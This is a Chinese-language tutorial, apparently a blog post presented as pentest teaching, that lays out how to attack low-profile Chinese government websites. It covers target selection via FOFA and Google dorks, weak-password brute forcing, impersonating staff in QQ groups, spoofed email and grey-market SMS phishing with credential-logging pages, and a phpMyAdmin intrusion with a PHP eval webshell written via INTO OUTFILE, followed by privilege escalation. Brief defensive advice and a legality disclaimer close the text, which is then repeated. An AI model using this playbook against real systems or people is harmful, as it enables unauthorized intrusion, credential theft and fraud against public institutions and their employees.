继续聊聊梦里的那点事儿(下)
字数 2060 2025-08-18 11:38:56

网络安全渗透测试实战教学文档

0x01 信息收集方法论

1.1 目标选择策略

  • 优先选择职能偏僻、群众接触少的机关单位网站
  • 关注无域名仅通过IP访问的边缘系统
  • 选择具有较多下属单位的大型目标作为突破口

1.2 信息收集技术

  1. 子域名爆破

    • 使用在线工具或lijiejie脚本进行子域名枚举
    • 示例工具:Sublist3r、Amass、OneForAll
  2. IP关联分析

    • 收集主域名和子域名对应IP
    • 通过IP反查域名(旁站查询)
    • 扫描IP开放的不同端口服务
  3. C段扫描

    • 对发现的机关单位IP进行C段扫描
    • 工具推荐:Masscan、Nmap
  4. 网络空间搜索引擎

    • FOFA:资产收集全面,相同IP查到的站比ZoomEye多
    • ZoomEye:各有优势,建议结合使用
    • 搜索语法:title="政府" && country="CN"
  5. Google Hacking

    • 使用高级搜索语法查找边缘资产
    • 示例:site:gov.cn intitle:"管理后台"

0x02 弱口令攻击实战

2.1 目标筛选策略

  • 批量查询网站访问量,优先攻击低访问量站点
  • 批量扫描常见后台路径,生成字典进行爆破

2.2 弱口令爆破流程

  1. 后台路径枚举

    • 使用DirBuster、Dirsearch等工具扫描常见后台路径
    • 常见路径:/admin//login.php/manager/
  2. 验证码处理

    • 优先攻击无验证码的后台
    • 有验证码的后台可尝试OCR识别或手工测试
  3. 密码字典构建

    • 基础弱口令:admin、admin123、123456、888888
    • 默认密码:查阅系统文档获取默认凭证
    • 组合密码:Admin@2023、System!123
  4. 爆破工具选择

    • Hydra:支持多种协议爆破
    • Burp Suite Intruder:精细化爆破
    • 自定义Python脚本:针对特定系统优化

2.3 成功案例

  • 视频会议系统后台:通过默认凭证admin/admin123进入
  • 获取权限后可:
    • 远程控制视频服务器
    • 查看会议日志和参与人员信息
    • 下载服务器日志
    • 备份数据库
    • 实时观看视频会议室

0x03 社会工程学攻击

3.1 目标分析

  • 针对安全性高的OA系统(无弱口令、无SQL注入/XSS)
  • 通过信息收集发现站群应用QQ群

3.2 身份伪造技术

  1. 小号准备

    • 使用养熟的备用账号(非新建账号)
    • 头像、签名、动态模仿真实用户
  2. 目标调研

    • 通过官网查询部门组织架构
    • 收集下属单位信息
    • 获取人员姓名、职位等基本信息
  3. 入群伪装

    • 选择30+女性职员作为伪装对象
    • 准备符合身份的QQ资料
    • 验证群内是否已存在该身份

3.3 群内信息收集

  • 下载群文件(使用手册、培训名单、防护情况)
  • 分析系统架构和部署时间线
  • 获取人员联系方式(QQ、邮箱、手机号)

3.4 钓鱼攻击实施

  1. 邮件钓鱼

    • 使用swaks伪造邮件
    • 绕过垃圾邮件过滤技巧:
      • 避免敏感关键词("机关单位"等)
      • 减少超链接使用
      • 伪装发件人身份(如"信息管理处-小李")
  2. 短信钓鱼

    • 通过灰产短信服务商发送
    • 伪装技巧:
      • 使用【单位名称】前缀
      • 内容简洁正式
      • 准备备案证明等"凭证"
    • 钓鱼页面构建:
      • 克隆真实后台页面
      • 去除验证码
      • 记录提交的凭证

0x04 边缘系统渗透

4.1 目标特征

  • 无域名,仅通过IP+非标准端口访问
  • 使用老旧或自主开发系统
  • 管理员安全意识薄弱

4.2 渗透案例

  1. phpMyAdmin利用

    • 扫描发现phpMyAdmin 2.6.3
    • 尝试通用密码漏洞:'localhost'@'@'
    • root空密码成功登录
  2. Webshell上传

    • 通过phpinfo获取真实路径
    • 使用SQL命令写马:
      SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php'
      
    • 蚁剑连接获取交互式shell
  3. 密码解密

    • 在phpMyAdmin中发现加密密码
    • 分析网站代码找到加密函数(password.php、func.php)
    • 逆向自定义加密算法获取明文密码
  4. 权限提升

    • 查看当前权限:whoami(daemon)
    • 尝试提权方法:
      • 内核漏洞提权(Dirty Cow)
      • SUID提权
      • 新建root权限用户

0x05 防御建议

5.1 针对弱口令

  • 强制密码复杂度要求(大小写、数字、特殊字符)
  • 定期强制修改密码
  • 禁用默认账户和密码
  • 实施多因素认证

5.2 针对社会工程学

  • 加强群组管理,严格审核入群身份
  • 敏感文件加密或设置访问权限
  • 员工安全意识培训
  • 建立官方通知渠道验证机制

5.3 系统安全加固

  • 及时更新系统和组件补丁
  • 禁用不必要的服务和端口
  • 限制数据库远程访问
  • 实施最小权限原则
  • 定期安全审计和渗透测试

附录:工具列表

  1. 信息收集:Sublist3r、FOFA、ZoomEye
  2. 漏洞扫描:Nmap、Masscan、Dirsearch
  3. 密码爆破:Hydra、Burp Suite
  4. Webshell管理:蚁剑、C刀
  5. 提权工具:Dirty Cow、LinEnum
  6. 社会工程:SET、Swaks

注:本文所述技术仅用于合法授权测试,未经授权进行渗透测试属于违法行为。

网络安全渗透测试实战教学文档 0x01 信息收集方法论 1.1 目标选择策略 优先选择职能偏僻、群众接触少的机关单位网站 关注无域名仅通过IP访问的边缘系统 选择具有较多下属单位的大型目标作为突破口 1.2 信息收集技术 子域名爆破 : 使用在线工具或lijiejie脚本进行子域名枚举 示例工具:Sublist3r、Amass、OneForAll IP关联分析 : 收集主域名和子域名对应IP 通过IP反查域名(旁站查询) 扫描IP开放的不同端口服务 C段扫描 : 对发现的机关单位IP进行C段扫描 工具推荐:Masscan、Nmap 网络空间搜索引擎 : FOFA:资产收集全面,相同IP查到的站比ZoomEye多 ZoomEye:各有优势,建议结合使用 搜索语法: title="政府" && country="CN" Google Hacking : 使用高级搜索语法查找边缘资产 示例: site:gov.cn intitle:"管理后台" 0x02 弱口令攻击实战 2.1 目标筛选策略 批量查询网站访问量,优先攻击低访问量站点 批量扫描常见后台路径,生成字典进行爆破 2.2 弱口令爆破流程 后台路径枚举 : 使用DirBuster、Dirsearch等工具扫描常见后台路径 常见路径: /admin/ 、 /login.php 、 /manager/ 验证码处理 : 优先攻击无验证码的后台 有验证码的后台可尝试OCR识别或手工测试 密码字典构建 : 基础弱口令:admin、admin123、123456、888888 默认密码:查阅系统文档获取默认凭证 组合密码:Admin@2023、System !123 爆破工具选择 : Hydra:支持多种协议爆破 Burp Suite Intruder:精细化爆破 自定义Python脚本:针对特定系统优化 2.3 成功案例 视频会议系统后台:通过默认凭证admin/admin123进入 获取权限后可: 远程控制视频服务器 查看会议日志和参与人员信息 下载服务器日志 备份数据库 实时观看视频会议室 0x03 社会工程学攻击 3.1 目标分析 针对安全性高的OA系统(无弱口令、无SQL注入/XSS) 通过信息收集发现站群应用QQ群 3.2 身份伪造技术 小号准备 : 使用养熟的备用账号(非新建账号) 头像、签名、动态模仿真实用户 目标调研 : 通过官网查询部门组织架构 收集下属单位信息 获取人员姓名、职位等基本信息 入群伪装 : 选择30+女性职员作为伪装对象 准备符合身份的QQ资料 验证群内是否已存在该身份 3.3 群内信息收集 下载群文件(使用手册、培训名单、防护情况) 分析系统架构和部署时间线 获取人员联系方式(QQ、邮箱、手机号) 3.4 钓鱼攻击实施 邮件钓鱼 : 使用swaks伪造邮件 绕过垃圾邮件过滤技巧: 避免敏感关键词("机关单位"等) 减少超链接使用 伪装发件人身份(如"信息管理处-小李") 短信钓鱼 : 通过灰产短信服务商发送 伪装技巧: 使用【单位名称】前缀 内容简洁正式 准备备案证明等"凭证" 钓鱼页面构建: 克隆真实后台页面 去除验证码 记录提交的凭证 0x04 边缘系统渗透 4.1 目标特征 无域名,仅通过IP+非标准端口访问 使用老旧或自主开发系统 管理员安全意识薄弱 4.2 渗透案例 phpMyAdmin利用 : 扫描发现phpMyAdmin 2.6.3 尝试通用密码漏洞:'localhost'@'@' root空密码成功登录 Webshell上传 : 通过phpinfo获取真实路径 使用SQL命令写马: 蚁剑连接获取交互式shell 密码解密 : 在phpMyAdmin中发现加密密码 分析网站代码找到加密函数(password.php、func.php) 逆向自定义加密算法获取明文密码 权限提升 : 查看当前权限: whoami (daemon) 尝试提权方法: 内核漏洞提权(Dirty Cow) SUID提权 新建root权限用户 0x05 防御建议 5.1 针对弱口令 强制密码复杂度要求(大小写、数字、特殊字符) 定期强制修改密码 禁用默认账户和密码 实施多因素认证 5.2 针对社会工程学 加强群组管理,严格审核入群身份 敏感文件加密或设置访问权限 员工安全意识培训 建立官方通知渠道验证机制 5.3 系统安全加固 及时更新系统和组件补丁 禁用不必要的服务和端口 限制数据库远程访问 实施最小权限原则 定期安全审计和渗透测试 附录:工具列表 信息收集:Sublist3r、FOFA、ZoomEye 漏洞扫描:Nmap、Masscan、Dirsearch 密码爆破:Hydra、Burp Suite Webshell管理:蚁剑、C刀 提权工具:Dirty Cow、LinEnum 社会工程:SET、Swaks 注:本文所述技术仅用于合法授权测试,未经授权进行渗透测试属于违法行为。